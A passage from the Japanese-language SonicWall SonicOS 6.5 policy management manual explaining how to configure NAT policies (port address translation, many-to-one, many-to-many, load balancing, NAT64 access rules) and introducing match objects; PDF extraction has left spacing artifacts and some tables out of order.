セクシ ョ ンを調べて、 必要なすべての項目を正し く設定したことを確認します。

WAN IP アドレス経由の着信ポート アドレス変換

これは、 SonicOS が動作しているファイアウォール上に作成できる、 より複雑な NAT ポリシーの 1 つで、 フ ァイアウォールの WAN IP アドレスを使用して、 複数の内部サーバにアクセスできるようにな

ります。 このポリシーが特に有効なのは、 ISP から 1 つのパブリ ッ ク IP アドレスしか提供されず、 そ

の IP アドレスをファイアウォールの WAN インターフェース (既定では X1 インターフェース) で使用す

る必要がある場合などです。

ログ オン

コ メン ト 簡単な説明を入力

オプシ ョ ンの選択: 1 対 1 の NAT ポリシー ルールによる着信ポート アドレス変換

オプシ ョ ン 値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定125

以下では、 ファイアウォールの WAN IP アドレス経由で 2 台の内部ウェブ サーバへのパブリ ック アク

セスを提供する設定を行います。 各サーバは固有の個別ポートに接続されます。 ポートがすべて一意である限り、 2 つ以上を作成することが可能です。

フ ァ イアウォールの WAN IP アド レスを使用して複数の内部サーバにアクセスできるよ うにするに

は、 以下の作業を行います。

1 サーバが応答する固有のパブリ ック ポートに対応する 2 つのユーザ定義サービス オブジェク ト

を作成します。 サービス オブジェク トの作成を参照して く ださい。

2 サーバのプライベート IP アドレスに対応する 2 つのアドレス オブジェク トを作成します。 アド

レス オブジェク トの作成を参照して ください。

3 2 つの NAT ポリシーを作成して、 2 台のサーバがパブリ ック インターネッ トへのト ラフ ィ ック

を開始できるようにします。 発信 NAT ポリシーの作成を参照して ください。

4 2 つの NAT ポリシーを作成して、 個別ポート を実際のリスニング ポートに割り付け、 各サーバ

のプライベート IP アドレスをファイアウォールの WAN IP アドレスに割り付けます。 受信 NATポリシーの作成を参照して ください。

5 2 つのアクセス ルールを作成して、 任意のパブリ ック ユーザが、 ファイアウォールの WAN IP アドレス経由で両方のサーバ、 および各サーバの固有の個別ポートに接続できるようにします。アクセス ルールの作成を参照して ください。

WAN IP アドレス経由の着信ポート アドレス変換ポリシーを作成するには、 以下の手順に従

います。

サービス オブジェク トの作成

1 管理ビューで、 「ポリシー | オブジェク ト > サービスオブジェク ト」 ページを開きます。

2 「追加」 ボタンを選択します。 「サービスの追加」 ダイアログが表示されます。

3 「名前」 に対して、 servone_public_port や servtwo_public_port などのカスタム サービスオブジェ

ク ト名を入力します。

4 プロ ト コルとして 「TCP (6)」 を選択します。

5 9100 を servone_public_port の開始および終了ポート と して入力します。

6 9200 を servtwo_public_port の開始および終了ポート と して入力します。

7 それぞれのユーザ定義サービスを設定した後は、 「追加」 ボタンを選択してユーザ定義サービスを保存します。

8 両方のユーザ定義サービスを設定したら、 「閉じる」 ボタンを選択します。

アドレス オブジェク トの作成

1 管理ビューで、 [ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 「追加」 ボタンを選択します。 「アドレス オブジェク トの追加」 ダイアログが表示されます。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定126

3 「名前」 に対して、 servone_private_ip や servtwo_private_ip などのカスタム サービスオブジェク

ト名を入力します。

4 「ゾーンの割り当て」 ド ロップダウン メニューで、 サーバが配置されているゾーンを選択し

ます。

5 「種別」 ドロップダウン メニューで 「ホス ト」 を選択します。

6 「IP アドレス」 フ ィールドにサーバのプライベート IP アドレスを入力します。

7 それぞれのアドレス オブジェク ト を設定した後は、 「追加」 ボタンを選択してアドレス オブ

ジェク ト を作成します。

8 両方のアドレス オブジェク ト を設定したら、 「閉じる」 ボタンを選択します。

発信 NAT ポリシーの作成

1 管理ビューで、 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

2 「追加」 ボタンを選択します。 「NAT ポリシーの追加」 ダイアログが表示されます。

3 2 つの NAT ポリシーを作成して、 両方のサーバがファイアウォールの WAN IP アドレスを使用し

てパブリ ック インターネッ トへのト ラフ ィ ッ クを開始できるようにするには、 オプシ ョ ンの選

択: インターネッ トへのト ラフ ィ ッ クを開始する 2 台のサーバテーブルに示す 2 つのオプシ ョ

ンセッ ト を設定します。

4 サーバごとに NAT ポリシーを設定した後は、 「追加」 ボタンを選択し、 その NAT ポリシーを追

加して有効にします。

オプシ ョ ンの選択: インターネッ トへのト ラフ ィ ックを開始する 2 台のサーバ

オプシ ョ ン サーバ 1 の値 サーバ 2 の値

変換前の送信元 servone_private_ip servtwo_private_ip

変換後の送信元 WAN Interface IP WAN Interface IP

変換前の送信先 すべて すべて

変換後の送信先 オリジナル オリジナル

変換前のサービス すべて すべて

変換後のサービス オリジナル オリジナル

受信インターフェース X3 X3

発信インターフェース X1 X1

コ メン ト 簡単な説明を入力 簡単な説明を入力

NAT ポリシーを有効にする オン オン

再帰ポリシーを作成する (淡色表示) (淡色表示)

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定127

5 両方 NAT ポリシーを設定したら、 「閉じる」 ボタンを選択します。

これらのポリシーを適用すると、 フ ァ イアウォールは、 インターフ ェース (既定では X1 イン

ターフ ェース) からのト ラフ ィ ッ ク開始時に、 サーバのプライベート IP アドレスをパブリ ッ ク

IP アドレスに変換します。

受信 NAT ポリシーの作成

1 再び 「ルール > NAT ポリシー」 ページの 「追加」 ボタンを選択します。 「NAT ポリシーの追加」

ダイアログが表示されます。

2 カスタムポート を両方のサーバの実際のリスニングポートにマップし、 フ ァ イアウォールの

WAN IP アドレスをサーバーのプライベート アドレスにマップする 2 つの NAT ポリシーを作成

するには、 オプシ ョ ンの選択: サーバへの個別ポートの割付テーブルに示す 2 つのオプシ ョ ン

セッ ト を構成します。

オプシ ョ ンの選択: サーバへの個別ポートの割付

オプシ ョ ン サーバ 1 の値 サーバ 2 の値

変換前の送信元 すべて すべて

変換後の送信元 オリジナル オリジナル

変換前の送信先 WAN Interface IP WAN Interface IP

変換後の送信先 servone_private_ip servtwo_private_ip

変換前のサービス servone_public_port servtwo_public_port

変換後のサービス HTTP HTTP

受信インターフェース X1 X1

発信インターフェース すべて すべて

メ モ : 送信先イン ターフ ェースの設定では、 サーバが接続されているインターフ ェースを指定するのではなく、 必ず 「すべて」 を選択し て く ださい。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定128

3 サーバごとに NAT ポリシーを設定した後は、 「追加」 ボタンを選択し、 その NAT ポリシーを追

加して有効にします。

4 両方 NAT ポリシーを設定したら、 「閉じる」 ボタンを選択します。

これらのポリシーを適用すると、 ファイアウォールは、 WAN インターフェース (既定では X1 インターフ ェース) 経由での接続要求の到着時に、 サーバのパブリ ッ ク IP アドレスをプライベー

ト IP アドレスに変換します。

アクセス ルールの作成

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 ボタンを選択します。 「ルールの追加」 ダイアログが表示されます。

3 パブリ ック インターネッ トのすべてのユーザが個別ポート とファイアウォールの WAN IP アドレ

スを使用して 2 台のウェブ サーバにアクセスできるよ うにするためのアクセス ルールを作成

するには、 オプシ ョ ンの選択: アクセス ルールの作成テーブルに示されている 2 つのオプシ ョ

ンを設定します。

コ メン ト 簡単な説明を入力 簡単な説明を入力

NAT ポリ シーを有効に

する

オン オン

再帰ポリシーを作成する 消去 消去

オプシ ョ ンの選択: アクセス ルールの作成

オプシ ョ ン サーバ 1 の値 サーバ 2 の値

動作 許可 許可

送信元 WAN WAN

送信先 サーバに割り当てられたゾーン

サーバに割り当てられたゾーン

オプシ ョ ンの選択: サーバへの個別ポートの割付

オプシ ョ ン サーバ 1 の値 サーバ 2 の値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定129

4 サーバごとにアクセス ルールを設定した後は、 「追加」 ボタンを選択し、 そのアクセス ルール

を追加して有効にします。

5 両方のアクセス ルールを設定したら、 「閉じる」 ボタンを選択します。

テスト と検証

確認するには、 新しいカスタム ポートのパブリ ッ ク インターネッ トにあるシステムを使用し

て、 フ ァイアウォールの WAN IP アドレスを使用して Web サーバにアクセスして く ださい (例:http://67.115.118.70:9100 と http://67.115.118.70:9200 など)。 正常に接続でき

るはずです。 接続不可の場合は、 このセクシ ョ ンとを調べて、 必要なすべての項目を正し く設定したことを確認します。

多対 1 の NAT ポリシーの作成

多対 1 は SonicWall セキュリテ ィ装置で非常に一般的な NAT ポリシーであり、 アドレスのグループを

単一のアド レスに変換するこ とができます。 ほとんどの場合、 これは、 内部 "プライベート " IP サブ

ネッ ト を対象と して、 そこから送信されるすべての要求をファイアウォールの WAN インターフ ェー

ス (既定では X1 インターフェース) の IP アドレスからの要求に変換することを意味します。 この変換

を行う と、 送信先からは、 その要求の送信元が内部プライベー ト IP ア ド レスではな く、 フ ァ イア

ウォールの WAN インターフェースの IP アドレスであるかのように見えます。

送信元ポート すべて すべて

サービス servone_public_port servtwo_public_port

送信元 すべて すべて

送信先 WAN Interface IP WAN Interface IP

包含ユーザ すべて すべて

除外ユーザ なし なし

スケジュール 常に有効 常に有効

ログ オン オン

コ メン ト 簡単な説明を入力 簡単な説明を入力

オプシ ョ ンの選択: アクセス ルールの作成

オプシ ョ ン サーバ 1 の値 サーバ 2 の値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定130

多対 1 のポリシーを作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

2 「追加」 ボタンを選択します。 「NAT ポリシーの追加」 ダイアログが表示されます。

3 NAT ポリシーを作成して X3 インターフェース上のすべてのシステムがファイアウォールの WANポートの IP アドレスを使用して ト ラフ ィ ッ クを開始できるようにするには、 以下のオプシ ョ ン

を選択します。

オプシ ョ ンの選択: 多対 1 の NAT ポリシーの例

オプシ ョ ン 値

変換前の送信元 X3 サブネッ ト

変換後の送信元 WAN Interface IP

変換前の送信先 すべて

変換後の送信先 オリジナル

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定131

4 「追加」 ボタンを選択し、 NAT ポリシーを追加して有効にします。 新しいポリシーが 「NAT ポリ

シー」 テーブルに追加されます。

5 「閉じる」 を選択します。

多対多の NAT ポリシーの作成

多対多の NAT ポリシーを使用すると、 特定のアドレス グループを別のアドレス グループに変換でき

ます。 このポリシーによって、 ファイアウォールでは、 複数のアドレスを利用した動的変換を実行できます。 多対多の NAT ポリシーに、 同じネッ トワーク接頭辞を持つ変換前の送信元と変換後の送信元

が含まれる場合、 IP アドレスの残りの部分は変わりません。

変換前のサービス すべて

変換後のサービス オリジナル

受信インターフェース X3

発信インターフェース X1

コ メン ト 簡単な説明を入力

NAT ポリシーを有効にする オン

再帰ポリシーを作成する (淡色表示)

メモ : このポリシーは、 フ ァ イアウォールのその他のインターフ ェースの背後にあるサブネットで複製できます。 手順は次のとおりです。

1 「変換前の送信元」 をそのインターフェースの背後にあるサブネッ トに変更する。2 送信元のインターフェースを調整する。3 別の NAT ポリシーを追加する。

オプシ ョ ンの選択: 多対 1 の NAT ポリシーの例

オプシ ョ ン 値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定132

多対多のポリシーを作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 ページの上部にある 「追加」 を選択します。 「アドレス オブジェク トの追加」 ダイアログが表

示されます。

3 「名前」 フ ィールドにアドレス範囲の説明 (public_range など) を入力します。

4 「ゾーンの割り当て」 ドロップダウン メニューで、 ゾーンとして 「WAN」 を選択します。

5 「種別」 ドロップダウン メニューで 「範囲」 を選択します。 「アドレス オブジェク トの追加」

ダイアログの表示が変化します。

6 「開始アドレス」 フ ィールド と 「終了アドレス」 フ ィールドにアドレスの範囲 (通常は ISP から

割り当てられるパブリ ック IP アドレス) を入力します。

7 「追加」 を選択して範囲オブジェク ト を作成します。 新しいアドレス オブジェク トが 「アドレ

ス オブジェク ト」 テーブルに追加されます。

8 「閉じる」 を選択します。

9 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定133

10 「NAT ポリシー」 ページの上部にある 「追加」 を選択します。 「NAT ポリシーの追加」 ダイアロ

グが表示されます。

11 NAT ポリシーを作成することにより、 LAN サブネッ ト (既定では X0 インターフェース) 上のシス

テムがパブリ ッ ク範囲のアドレスを使用して ト ラフ ィ ッ クを開始できるようにするには、 オプシ ョ ンの選択: 多対多の NAT ポリシーの例のオプシ ョ ンを選択します。

12 「追加」 を選択して、 NAT ポリシーを追加して有効化します。 新しいポリシーが 「NAT ポリシー」

テーブルに追加されます。

13 「閉じる」 を選択して 「NAT ポリシーの追加」 ダイアログを閉じます。

オプシ ョ ンの選択: 多対多の NAT ポリシーの例

オプシ ョ ン 値

変換前の送信元 LAN サブネッ ト

変換後の送信元 public_range

変換前の送信先 すべて

変換後の送信先 オリジナル

変換前のサービス すべて

変換後のサービス オリジナル

受信インターフェース X0

発信インターフェース X1

コ メン ト 簡単な説明を入力

NAT ポリシーを有効にする オン

再帰ポリシーを作成する (淡色表示)

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定134

このポリシーを適用すると、 ファイアウォールは、 作成した範囲内で使用可能な 4 つの IP アドレスを

使用して、 送信ト ラフ ィ ッ クを動的に割り付けます。

時刻動的な割付をテス トするには、 LAN インターフ ェース (既定では X0 インターフ ェース) 上の拡散

したアドレス範囲 (192.168.10.10、 192.168.10.100、 192.168.10.200 など) に複数のシステ

ムをインス トールして、 各システムからパブリ ッ ク ウェブ サイ ト 〈http://www.whatismyip.com〉 にアクセスします。 各システムには、 作成して NAT ポリシーに連結した範囲の中から別々の IP アドレ

スが表示されるはずです。

1 対多の NAT 負荷分散の設定

1 対多のネッ トワーク アドレス変換 (NAT) ポリシーを使用することにより、 変換前の送信元 IP アドレ

スを恒久性への鍵と して使用して、 恒久性を維持しながら、 変換後の送信先の負荷を均衡化できます。 例えば、 フ ァイアウォールでは、 適切な宛先の SMA に対して常にクライアン ト間の均衡を取る

ことによって、 セッシ ョ ンの恒久性を維持しながら複数の SonicWall SMA 装置の負荷分散を可能にし

ています。

この NAT ポリシーは、 アクセス許可ルールと組み合わせられます。

1 対多の負荷分散ポリシーとアクセス ルールを設定するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 を選択して 「ルールの追加」 ダイアログを表示します。

メモ :多対多の NAT ポリシーに、 同じネッ トワーク接頭辞を持つ変換前の送信元と変換後の送

信元が含まれる場合、 IP アドレスの残りの部分は変わりません。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定135

3 オプシ ョ ンの選択: 1 対多アクセス ルールテーブルに表示された値を入力します。

オプシ ョ ンの選択: 1 対多アクセス ルール

オプシ ョ ン 値

動作 許可

送信元 WAN

送信先 LAN

送信元ポート ポート を選択。 既定は 「すべて」

メモ : 「送信元ポート」 を設定すると、 アクセス ルールは選択さ

れたサービス オブジェ ク ト /グループで定義されている送信元

ポートに基づいて ト ラフ ィ ッ クをフ ィルタ処理します。 選択されたサービス オブジェ ク ト /グループには、 「サービス」 で選択す

るのと同じプロ ト コル種別が設定されている必要があります。

サービス HTTPS

送信元 すべて

送信先 WAN プライマリ IP

包含ユーザ すべて

除外ユーザ なし (既定)

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定136

4 「追加」 を選択します。 ルールが追加されます。

5 「閉じる」 を選択します。

6 「ルール > NAT ポリシー」 ページを開きます。

7 ページの上部にある 「追加」 を選択します。 「NAT ポリシーの追加」 ダイアログが表示されます。

8 NAT ポリシーを作成することにより、 ウェブ サーバがマッピング済みのパブリ ック IP アドレス

を使用してパブリ ッ ク インターネッ トへのト ラフ ィ ッ クを開始できるよ うにするには、 オプ

シ ョ ンの選択: 1 対多の NAT 負荷分散ポリシーの例テーブルのオプシ ョ ンを選択します。

スケジュール 常に有効

コ メン ト SMA LB などの説明テキスト

ログを有効にする 選択

断片化パケッ ト を許可する 選択

他のすべてのオプシ ョ ン 未選択

オプシ ョ ンの選択: 1 対多の NAT 負荷分散ポリシーの例

オプシ ョ ン 値

変換前の送信元 すべて

変換後の送信元 オリジナル

変換前の送信先 WAN プライマリ IP

オプシ ョ ンの選択: 1 対多アクセス ルール

オプシ ョ ン 値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定137

9 設定が完了したら、 「追加」 ボタンを選択し、 NAT ポリシーを追加して有効にします。

10 「閉じる」 を選択します。

1 対多 NAT 負荷分散ポリシーのより具体的な例については、 2 つのウェブ サーバの NAT 負荷分散の設

定を参照して ください。

2 つのウェブ サーバの NAT 負荷分散の設定

これは、 1 対多 NAT 負荷分散ポリシーのより具体的な例です。 この例で NAT 負荷分散を設定するに

は、 次の作業を行います。

1 ロギングのログと名前解決の有効化

2 アドレス オブジェク ト とアドレス グループの作成

変換後の送信先 「新しいアド レス オブジェ ク トの作成」 を選択すると、 「ア ド レス

オブジェ ク トの追加」 ダイアログが表示されます。 オプシ ョ ンの選択: 「ア ド レス オブジェ ク トの追加」 ダイアログのオプシ ョ ンを使用

します。

変換前のサービス HTTPS

変換後のサービス HTTPS

受信インターフェース すべて

発信インターフェース すべて

コ メン ト SMA LB などの説明テキスト

NAT ポリシーを有効に

する

選択

再帰ポ リ シーを作成する

非選択

オプシ ョ ンの選択: 1 対多の NAT 負荷分散ポリシーの例

オプシ ョ ン 値

オプシ ョ ンの選択: 「アドレス オブジェク トの追加」 ダイアログ

オプシ ョ ン 値

名前 説明的な名前 (例えば MySMA)

ゾーンの割り当て LAN

種別 ホスト

IP アドレス 負荷分散する機器の IP アドレス (上記の図に示し

たトポロジの場合は、 192.168.200.10、192.168.200.20、 および 192.168.200.30。 )

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定138

3 受信 NAT 負荷分散ポリシーの作成

4 送信 NAT ポリシーの作成

5 アクセス ルールの作成

6 NAT 負荷分散設定の確認と ト ラブル シューテ ィ ング

ロギングのログと名前解決の有効化

ログ採取を有効にするには:

1 管理ビューで、 「ログと報告 | ログ設定 > 基本設定」 ページを開きます。

2 「ログ レベル」 の横のドロップダウン メニューから 「デバッグ」 を選択します。

3 「設定」 アイコン を選択して、 「すべての種別の属性の編集」 ダイアログを開きます。

4 「イベン ト をログ監視に表示する」 および他の設定の 「有効化」 を選択します。

5 「すべての種別の属性を編集」 ダイアログで 「許可」 をリ ックします。

6 「ログ設定 > 基本設定」 で 「適用」 を選択すると、 変更内容が保存されて有効になります。

重要 :すべての種別のログの記録、 およびログの名前解決を有効にすることを強くお勧めします。

ヒン ト : デバッグ レベルのログは初期の設定および ト ラブルシューテ ィ ングの目的に

限って使用し、 設定が完了した時点で、 実際のネッ トワーク環境に合った適切なログ レベルを設定することをお勧めします。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定139

ログの名前解決を有効にするには、 以下の手順を実行します。

1 管理ビューで、 「ログと報告 |ロ グ設定 > 名前解決」 ページを開きます。

2 「名前解決方法」 ドロップダウン メニューで 「DNS の後に NetBIOS」 を選択します。 「DNS の設

定」 セクシ ョ ンが表示されます。

3 「WAN ゾーンと同じ DNS サーバ設定にする」 オプシ ョ ンを選択します。 「ログ名前解決用 DNSサーバ」 の各フ ィールドの値は自動的に設定され、 変更できません。

4 「許可」 ボタンを選択して、 変更内容を保存し有効にします。

アドレス オブジェク ト とアドレス グループの作成

アドレス オブジェク ト とアドレス グループを作成するには :

1 管理ビューで、 「ポリシー | オブジェク ト > アドレス オブジェク ト」 ページを開きます。

2 両方の内部ウェブ サーバ用のアドレス オブジェク ト と、 外部ユーザがサーバへのアクセスに使

用する仮想 IP を作成します。 以下に例を示します。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定140

3 「アドレス グループ」 ボタンを選択します。

4 www_group という名前のアドレス グループを作成し、 直前の手順で作成した 2 つの内部サーバ

アドレス オブジェク ト を追加します。 以下に例を示します。

受信 NAT 負荷分散ポリシーの作成

受信 NAT 負荷分散ポリシーを設定するには、 次の手順を実行します。

1 管理ビューで、 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

2 「追加」 を選択し、 www_group の受信 NAT ポリシーを作成します。 これによって、 仮想 IP にア

クセスしよう とする人には、 作成したばかりのアドレス グループに変換されます。 「一般」 の

設定を以下に示します。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定141

3 「詳細設定」 を選択します。 「NAT 方式」 の 「詳細」 画面で、 「NAT 方式」 として 「固定 IP」 を

選択します。

4 「高可用性」 で、 「論理監視を有効にする」 チェ ッ クボックスをオンにします。

5 「論理監視種別」 の場合、 ドロップダウン リストから 「TCP」 を選択し、 80 を 「ポート」 フ ィー

ルドに入力します。

メモ : この段階では、 まだ NAT ルールの保存は行わないで ください。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定142

SonicOS は、 TCP ポート 80 を監視することによって、 サーバが正常に動作、 応答しているかを

確認します (このポートはユーザのアクセス先です)。

6 「追加」 を選択し、 変更内容を保存して有効にします。

7 「閉じる」 ボタンを選択します。

送信 NAT ポリシーの作成

対応する発信 NAT ポリシーを設定するには、 次の手順を実行します。

1 管理ビューで、 「ポリシー | ルール > NAT ポリシー」 ページを開きます。

2 「追加」 を選択して、 www_group の 「送信」 NAT ポリシー を作成します。 これによって、 WANインターフ ェース (規定では X1 インターフ ェース) から リ ソースにアクセスするときに、 内部

サーバを仮想 IP に変換することができます。 「一般」 設定を以下に示します。 「詳細」 設定は

必要ありません。

メモ :次の作業に進む前に、 ログと状況のページをチェ ックして、 リソースが検出済みであること、 およびリソースがオンライン状態であることを示すログが記録されていることを確認して ください。 正常ならば、 「ネッ トワーク監視: ホスト 192.160.200.220 はオンラインです」 (IP アドレスは実際に使用されている値になります) という メ ッセージを

持つ 2 件の警告が 「ファイアウォール イベン ト」 と して表示されるはずです。 この 2 つの

メ ッセージが表示されていない場合は、 これまでの手順が適切に実行されているか確認して ください。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定143

アクセス ルールの作成

アクセスルールを設定するには :

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

2 「追加」 を選択して、 アクセスルールを作成し、 外部からのト ラフ ィ ッ クが仮想 IP 経由で内部

ウェブ サーバにアクセスできるようにします。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定144

3 「追加」 を選択してアクセス ルールを作成します。

4 「閉じる」 を選択してダイアログを閉じます。

NAT 負荷分散設定の確認と ト ラブル シューテ ィング

WAN を経由しないコンピュータのブラウザを使用して、 内部 ウェブ サーバの 1 つでホスト されている

ウェブ ページに HTTP 経由で接続して作業をテスト します。 仮想 IP 経由で接続する必要があります。

ウェブ サーバに対するアクセスが正常に行われていないと思われる場合は、 「ポリシー > アクセス

ルール管理」 ページを表示して、 マウス ポインタを統計アイコンの上に移動して ください。

ルールが正し く設定されていない場合には、 受信バイ ト と送信バイ トの統計情報はまった く表示されませんが、 正常に機能している場合は、 負荷分散対象リソースに対する外部からのアクセスが成功するたびに、 これらのバイ ト数が増加するのを確認できます。

また、 「ポリシー > NAT ポリシー」 ページで統計アイコンにマウス ポインタを合わせてチェ ックする

こともできます。 ポリシーが正し く設定されていない場合には、 受信バイ ト と送信バイ トの統計情報はまった く表示されませんが、 正常に機能している場合は、 負荷分散対象リソースに対する外部からのアクセスが成功するたびに、 これらのバイ ト数が増加するのを確認できます。

後に、 ログと状況のページをチェ ッ クして、 オフラインのホストがあることを示すネッ トワーク監視からの (黄色の) 警告が表示されていないか確認する必要があります。 正常にアクセスできない場合

メモ : 1 つ以上の SonicWall SMA アプライアンスの負荷を分散する場合は、 許可されたサービス

と して HTTP ではな く HTTPS を使用して、 これらの手順を繰り返します。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定145

は、 負荷分散用に設定されているすべてのリソースがファイアウォールから到達不能になっているおそれがあり、 その場合には、 それらのリソースがオフラインでサービス停止の状態にあることが監視メカニズムによって検出されている可能性があります。 負荷分散用のリソース、 およびそれらとファイアウォールの間のネッ トワーク接続の状態をチェ ッ クして、 それらが正常に機能していることを確認して ください。

NAT64 ポリシーのための WAN から WAN へのアクセス ルー

ルの作成

IPv6 専用クライアン トが IPv4 クライアン ト /サーバに対する接続を開始しても、 NAT64 ト ランスレー

タに届く IPv6 パケッ トは、 次のように通常の IPv6 パケッ トのように見えます。

• 送信元ゾーンは LAN。

• 送信先ゾーンは WAN。

これらのパケ ッ ト は、 SonicOS によ って処理された後、 IPv4 パケ ッ ト に変換され、 再びフ ァ イア

ウォールによって処理されます。 この時点で、 これらのパケッ トのソースゾーンは WAN であり、 宛

先ゾーンは元の IPv6 パケッ ト と同じです。 これらの IPv4 パケッ トのキャ ッシュがまだ作成されてい

ない場合、 これらのパケッ トはポリシー検査を受けます。 これらのパケッ トがドロップされないようにするには、 WAN から WAN への許可アクセス ルールを設定する必要があります。

WAN から WAN へのポアクセス ルールを作成するには、 以下の手順に従います。

1 管理ビューで、 「ポリシー | ルール > アクセス ルール」 ページを開きます。

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定146

2 「追加」 を選択します。 「ルールの追加」 ダイアログが表示されます。

3 以下のオプシ ョ ンを設定します。

オプシ ョ ン 値

動作 許可

送信元 WAN

送信先 WAN

送信元ポート すべて

サービス すべて

送信元 すべての WAN IP

メ モ : 「すべての WAN IP」 は、 フ ァ イアウォールの WAN イ ン

ターフ ェースに属するすべての WAN IP アドレスを含む SonicOS によって作成される既定のアドレス グループです。 すべての WAN IPは設定できません。

包含ユーザ すべて

除外ユーザ なし

スケジュール 常に有効

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定147

4 「追加」 を選択します。

5 「閉じる」 を選択します。

コ メン ト サービスを問わない任意のネッ トワーク間の IPv4 (オプシ ョ ン)

他のすべてのオプシ ョ ン そのままにしてお くか、 必要に応じて適宜設定します。

オプシ ョ ン 値

SonicWall SonicOS 6.5 ポリシー管理

NAT ポリシーの設定148

SonicWall SonicOS 6.5 ポリシー管理

ポリシー | オブジェク ト

第 2 部

149

ポリシー | オブジェク ト

• 一致オブジェク トの設定

• 動作オブジェク トの設定

• アドレス オブジェク トの設定

• サービス オブジェク トの設定

• 帯域幅オブジェク トの設定

• 電子メール アドレス オブジェク トの設定

• コンテンツ フ ィルタ オブジェク トの設定

5

一致オブジェク トの設定

• オブジェク ト > 一致 オブジェク ト (150 ページ)

• 一致オブジェク トについて (150 ページ)

• アプリケーシ ョ ン リス ト オブジェク トについて (161 ページ)

• 一致オブジェク トの設定 (164 ページ)

• アプリケーシ ョ ンリス トオブジェク トの設定 (165 ページ)

オブジェク ト > 一致 オブジェク ト

このセクシ ョ ンでは、 一致オブジェ ク トおよびアプリケーシ ョ ン リス ト オブジェ ク トの概要と、 そ

れらを作成および設定する方法について説明します。

ト ピック :

• 一致オブジェク トについて (150 ページ)

• アプリケーシ ョ ン リス ト オブジェク トについて (161 ページ)

• 一致オブジェク トの設定 (164 ページ)

• アプリケーシ ョ ンリス トオブジェク トの設定 (165 ページ)

一致オブジェク トについて一致オブジェク トは、 動作を実行するために満たす必要がある条件のセッ ト を表します。 これには、オブジェ ク ト種別、 一致する種別 (完全、 部分、 正規表現、 前方、 または後方)、 入力形式 (テキス ト

または 16 進)、 および照合する実際のコンテンツが含まれます。 一致オブジェク トは、 以前のリ リー

スではアプリケーシ ョ ン オブジェク ト と呼ばれていました。

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定150

実行可能ファイルなどのバイナリ コンテンツを照合する場合は 16 進入力形式を使用し、 フ ァイルや

電子メールのコンテンツなどを照合する場合は英数字 (テキス ト ) 入力形式を使用します。 また、 16進入力形式は、 グラ フ ィ ッ ク イ メージ内のバイナリ コンテンツに対しても使用できます。 グラ

フ ィ ッ クのいずれかのプロパテ ィ フ ィールドに特定の文字列が含まれている場合は、 テキス ト入力

形式を使用して同じグラフ ィ ッ クを照合するこ ともできます。 正規表現 (regex) は、 特定の文字列や

値ではな くパターンを照合するためのもので、 英数字入力形式を使用します。

ファイル内容一致オブジェク ト種別は、 ファイル内のパターンやキーワードを照合するための方法を提供します。 この種別の一致オブジェク トは、 FTP データ転送、 HTTP サーバ、 または SMTP クライア

ン ト ポリシーでのみ使用できます。

サポート されている一致オブジェク ト種別に、 サポート されている一致オブジェク ト種別を示します。

サポート されている一致オブジェク ト種別

オブジェク ト種別 説明 一致する種別 不一致検索 追加のプロパティ

ActiveX クラス ID ActiveX コンポーネント

のクラス ID。 例えば、

Gator ActiveX コンポー

ネントのクラス ID は“c1fb8842-5281-45ce-a271-8fd5f117ba5f"です。

完全 いいえ なし

アプリケーシ ョ ン種別リス ト

アプリケーシ ョ ン種別 (マルチメディア、

P2P、 ソーシャル ネッ

トワーキングなど) を指定できます。

N/A いいえ なし

アプリケーシ ョ ン リス ト

選択したアプリケーシ ョ ン種別内で個々のアプリケーシ ョ ンを指定できます。

N/A いいえ なし

アプリケーシ ョ ンシグネチャ リス ト

選択したアプリケーションや種別に対して個々のアプリケーションを指定できます。

N/A いいえ なし

SonicWall SonicOS 6.5 ポリシー管理

一致オブジェク トの設定151

個別オブジェク ト IPS 形式の条件の個

別セッ ト を指定できます。

完全 いいえ 4 つのオプション パラ

メータを追加で設定できます。 それらは

オフセッ ト、 深度、小ペイロード サイ

ズ、 大ペイロード サイズです。 オフ

セッ トは、 パケッ ト ペイロード内のどのバイ トからパターンの照合を開始するかを指定します (値は 1 から始まり、 照合における誤検出を 小限にする働きをします)。 深度は、 パケッ

ト ペイロード内のど

のバイ トでパターンの照合を終了するかを指定します (値は 1 から始まります)。

電子メール本文 電子メール本文内のすべての内容。

処理中 いいえ なし

電子メール CC の送信

先 (MIME ヘッダー)CC MIME ヘッダー内

のすべての内容。

完全、 部分、 前方、 後方

はい なし

